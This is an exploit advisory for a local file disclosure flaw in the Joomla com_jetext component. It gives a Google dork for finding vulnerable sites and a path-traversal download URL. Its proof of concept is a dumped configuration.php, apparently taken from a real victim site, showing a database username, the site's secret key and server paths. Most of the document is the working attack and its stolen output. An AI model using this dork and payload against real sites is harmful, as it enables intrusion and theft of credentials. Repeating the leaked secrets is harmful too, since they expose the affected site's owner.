Exploit Title: Joomla jetext LFD
# Google Dork: inurl:option=com_jetext
# Date: 03/10/2015
# Exploit Author: Đầu Lâu
# Vendor Homepage: don't have :((
# Version: all version
# Tested on: kali linux
link vuln: site:/index.php?option=com_jetext&task=download&file=[../../index.php]
POC:
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
public $sitename = 'Cong doan';
public $editor = 'tinymce';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'congdoanth';
public $password = 'xxx';
public $db = 'ldldth_2014';
public $dbprefix = 'jos_';
public $live_site = '';
public $secret = 'iGwM7scVp9QCRhxt';
public $gzip = '0';
public $error_reporting = '-1';
public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $offset_user = 'UTC';
public $mailer = 'mail';
public $mailfrom = 'admin@localhost.com';
public $fromname = 'Cong doan';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $MetaDesc = '';
public $MetaKeys = '';
public $MetaTitle = '1';
public $MetaAuthor = '1';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $log_path = 'C:\xampp\htdocs\congdoan\logs';
public $tmp_path = 'C:\xampp\htdocs\congdoan\tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $MetaRights = '';
public $sitename_pagetitles = '0';
public $force_ssl = '0';
public $feed_email = 'author';
public $cookie_domain = '';
public $cookie_path = '';
}
